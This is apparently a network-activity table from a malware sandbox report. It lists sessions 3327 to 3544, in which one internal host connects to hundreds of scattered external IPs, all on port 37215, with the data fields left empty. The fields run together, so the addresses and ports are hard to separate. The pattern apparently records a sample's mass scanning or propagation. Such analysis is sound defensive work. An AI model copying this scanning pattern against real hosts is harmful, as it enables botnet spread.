                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3327192.168.2.154177294.9.204.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3328192.168.2.153593231.219.77.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3329192.168.2.1558896212.231.79.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3330192.168.2.1551144156.137.106.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3331192.168.2.1556282122.99.124.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3332192.168.2.1542212121.51.244.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3333192.168.2.156088045.223.248.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3334192.168.2.1558174197.5.75.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3335192.168.2.1539558181.253.196.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3336192.168.2.1534534138.14.242.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3337192.168.2.1546014156.112.215.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3338192.168.2.1545544156.146.119.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3339192.168.2.1560984190.250.80.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3340192.168.2.1535354102.208.69.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3341192.168.2.1549838181.37.158.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3342192.168.2.155271445.66.72.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3343192.168.2.1552020122.171.102.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3344192.168.2.1536936190.63.216.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3345192.168.2.1536010156.31.164.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3346192.168.2.1535550121.46.85.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3347192.168.2.1540478157.118.28.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3348192.168.2.153829080.248.99.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3349192.168.2.1535994122.85.58.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3350192.168.2.155552237.255.153.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3351192.168.2.1538750121.35.212.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3352192.168.2.1558438132.9.28.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3353192.168.2.154891437.46.31.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3354192.168.2.1543344222.152.253.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3355192.168.2.1555106102.110.33.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3356192.168.2.1557350157.148.212.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3357192.168.2.1547450222.23.102.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3358192.168.2.1534054197.11.104.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3359192.168.2.1548316156.217.139.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3360192.168.2.155080294.45.17.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3361192.168.2.1554962197.184.211.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3362192.168.2.154841245.206.36.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3363192.168.2.1541768122.143.188.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3364192.168.2.155339437.176.136.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3365192.168.2.155588645.135.69.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3366192.168.2.1542260121.32.142.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3367192.168.2.154941094.3.102.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3368192.168.2.1536682157.154.46.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3369192.168.2.1552024121.87.82.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3370192.168.2.1554798102.118.50.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3371192.168.2.1548694138.171.82.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3372192.168.2.1552896181.185.191.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3373192.168.2.1542412102.19.255.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3374192.168.2.1537808197.39.45.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3375192.168.2.155249237.176.61.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3376192.168.2.1544224121.34.101.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3377192.168.2.1536122186.54.59.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3378192.168.2.1535316222.82.117.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3379192.168.2.1541754197.44.184.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3380192.168.2.1547818121.173.170.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3381192.168.2.1544238197.22.188.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3382192.168.2.1542734222.137.135.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3383192.168.2.1550764197.217.96.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3384192.168.2.1546810197.194.162.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3385192.168.2.153696094.240.20.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3386192.168.2.154383437.121.121.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3387192.168.2.1545338190.167.56.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3388192.168.2.154653894.61.220.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3389192.168.2.1550574121.76.223.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3390192.168.2.155497837.33.73.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3391192.168.2.1538734190.69.84.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3392192.168.2.1558610222.51.25.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3393192.168.2.1555510138.172.56.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3394192.168.2.1557478138.36.3.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3395192.168.2.153670237.145.242.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3396192.168.2.155312437.215.159.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3397192.168.2.1542330156.61.219.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3398192.168.2.154831845.253.250.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3399192.168.2.1541974186.79.72.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3400192.168.2.1544392138.180.161.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3401192.168.2.1542038157.91.50.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3402192.168.2.153908254.146.156.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3403192.168.2.1560114121.34.207.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3404192.168.2.1544326197.125.135.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3405192.168.2.154425845.225.3.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3406192.168.2.1545774181.164.102.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3407192.168.2.154416894.245.219.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3408192.168.2.155420831.86.170.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3409192.168.2.1537144186.148.238.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3410192.168.2.1545866157.117.71.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3411192.168.2.1557312190.92.24.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3412192.168.2.153279494.234.186.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3413192.168.2.1559778157.176.206.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3414192.168.2.155978645.107.182.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3415192.168.2.1534272157.97.219.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3416192.168.2.1552980122.13.244.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3417192.168.2.1555332102.76.96.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3418192.168.2.1552412102.70.159.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3419192.168.2.1556488190.105.149.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3420192.168.2.153508231.203.110.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3421192.168.2.155902637.46.58.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3422192.168.2.1544480222.41.117.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3423192.168.2.1559222190.118.117.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3424192.168.2.1546666121.82.186.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3425192.168.2.153973245.146.37.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3426192.168.2.156068637.87.25.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3427192.168.2.155673437.6.145.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3428192.168.2.1549570157.46.79.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3429192.168.2.1552084102.47.41.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3430192.168.2.1540596122.2.198.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3431192.168.2.155440231.119.74.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3432192.168.2.1556452190.224.137.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3433192.168.2.1554808156.184.102.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3434192.168.2.1537964156.214.155.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3435192.168.2.1540210197.162.74.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3436192.168.2.1539310121.111.181.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3437192.168.2.1536154121.114.40.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3438192.168.2.155586245.101.197.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3439192.168.2.155878837.166.231.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3440192.168.2.153525837.236.1.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3441192.168.2.1549884121.233.167.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3442192.168.2.155400694.110.41.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3443192.168.2.1537858181.64.223.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3444192.168.2.1538542197.169.148.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3445192.168.2.1554832157.52.179.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3446192.168.2.1540418181.246.211.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3447192.168.2.155938293.97.189.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3448192.168.2.155107624.104.94.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3449192.168.2.155633041.86.250.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3450192.168.2.1541410138.95.113.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3451192.168.2.1549822197.168.22.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3452192.168.2.1554800121.35.192.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3453192.168.2.1541306181.232.186.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3454192.168.2.1546566157.183.125.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3455192.168.2.1556144222.246.204.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3456192.168.2.1538036190.44.190.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3457192.168.2.155240494.221.148.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3458192.168.2.155529445.28.0.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3459192.168.2.1548474181.55.1.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3460192.168.2.1557686186.127.36.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3461192.168.2.154830237.103.78.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3462192.168.2.154995645.44.157.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3463192.168.2.1558118102.254.78.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3464192.168.2.154285845.253.147.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3465192.168.2.1540466138.252.165.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3466192.168.2.154263094.115.240.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3467192.168.2.1556710197.165.14.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3468192.168.2.155084694.230.108.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3469192.168.2.154833841.196.228.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3470192.168.2.1560498190.176.49.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3471192.168.2.1545944157.160.64.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3472192.168.2.1552054121.47.0.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3473192.168.2.154344031.58.107.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3474192.168.2.1550208102.103.113.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3475192.168.2.1559222121.202.177.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3476192.168.2.1554950156.213.152.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3477192.168.2.1541172121.91.49.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3478192.168.2.154301841.4.15.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3479192.168.2.1550422138.39.70.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3480192.168.2.1543792157.157.231.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3481192.168.2.1554044190.163.50.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3482192.168.2.154632437.192.15.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3483192.168.2.156093437.46.70.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3484192.168.2.154459294.36.52.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3485192.168.2.1560486181.218.47.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3486192.168.2.153548037.128.226.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3487192.168.2.1555270181.240.53.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3488192.168.2.153662437.210.41.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3489192.168.2.1556568197.104.24.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3490192.168.2.155977431.80.225.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3491192.168.2.154178637.226.141.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3492192.168.2.155384437.156.248.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3493192.168.2.1540930156.252.19.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3494192.168.2.1547836121.42.207.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3495192.168.2.154657041.192.49.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3496192.168.2.156089841.184.243.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3497192.168.2.155480237.2.81.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3498192.168.2.1548462190.178.111.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3499192.168.2.1558170102.32.219.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3500192.168.2.155837431.8.125.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3501192.168.2.155577631.226.253.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3502192.168.2.156027237.242.253.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3503192.168.2.1544286122.219.144.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3504192.168.2.1537748186.73.194.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3505192.168.2.1551172189.40.192.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3506192.168.2.1537986186.22.178.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3507192.168.2.1537216181.10.69.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3508192.168.2.1554236102.146.184.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3509192.168.2.153701841.251.69.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3510192.168.2.1550416102.139.18.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3511192.168.2.1556060197.205.212.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3512192.168.2.1560754186.159.66.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3513192.168.2.1547922122.197.205.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3514192.168.2.1550754197.155.116.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3515192.168.2.155605494.74.20.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3516192.168.2.1548318190.176.47.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3517192.168.2.1548064122.252.121.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3518192.168.2.1549384222.243.99.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3519192.168.2.155062641.8.191.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3520192.168.2.153742041.71.216.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3521192.168.2.155063694.20.37.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3522192.168.2.155954031.114.132.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3523192.168.2.153724072.170.189.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3524192.168.2.1534852156.185.43.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3525192.168.2.1546388138.95.154.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3526192.168.2.1554238122.39.235.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3527192.168.2.1539168197.236.19.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3528192.168.2.153563245.148.186.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3529192.168.2.154378437.113.113.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3530192.168.2.1551376156.248.122.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3531192.168.2.1549584156.211.247.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3532192.168.2.1557990222.240.42.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3533192.168.2.1538556102.209.231.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3534192.168.2.153558445.175.24.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3535192.168.2.1538918121.107.232.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3536192.168.2.155158445.13.249.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3537192.168.2.1547364121.16.154.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3538192.168.2.1547052102.140.241.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3539192.168.2.1552646156.180.42.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3540192.168.2.1557946121.141.228.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3541192.168.2.1535852181.108.115.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3542192.168.2.154598045.193.28.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3543192.168.2.154662445.247.135.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3544192.168.2.1543062181.125.1.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
